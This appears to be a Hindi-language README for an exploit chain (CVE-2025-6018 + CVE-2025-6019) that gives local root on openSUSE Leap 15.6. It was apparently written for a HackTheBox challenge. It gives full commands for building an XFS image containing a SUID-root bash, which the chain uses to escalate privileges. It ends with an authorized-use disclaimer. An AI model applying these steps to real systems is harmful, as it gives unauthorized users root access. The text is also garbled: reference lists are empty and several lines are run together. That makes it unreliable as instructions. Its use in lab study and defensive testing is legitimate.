
openSUSE Leap 15.6 के लिए विशेषाधिकार वृद्धि शोषण श्रृंखला (CVE-2025-6018 + CVE-2025-6019)
यह एक्सप्लॉइट openSUSE Leap 15.6 को लक्षित करने वाली HackTheBox चुनौती को हल करने के लिए विकसित किया गया था।
यह एक्सप्लॉइट Qualys सुरक्षा टीम के मूल शोध पर आधारित है:
अतिरिक्त संदर्भ कार्यान्वयन:
यह एक्सप्लॉइट openSUSE Leap 15.6 पर एक अनप्रिविलेज्ड उपयोगकर्ता से root तक स्थानीय विशेषाधिकार वृद्धि प्राप्त करने के लिए दो कमजोरियों को जोड़ता है:
एक्सप्लॉइट के लिए SUID bash बाइनरी युक्त पहले से निर्मित XFS फाइलसिस्टम इमेज की आवश्यकता होती है। इसे उस Linux मशीन पर बनाया जाना चाहिए जहाँ आपके पास root विशेषाधिकार हों:
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
सत्यापित करें कि इमेज सही ढंग से बनाई गई थी:
file xfs.image
# Should output: "SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment बनाता हैयदि एक्सप्लॉइट विफल हो जाता है:
file xfs.imagesystemctl status udisks2यह एक्सप्लॉइट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। जिम्मेदारी से उपयोग करें और केवल उन्हीं प्रणालियों पर जिन्हें आपके पास परीक्षण करने की अनुमति है।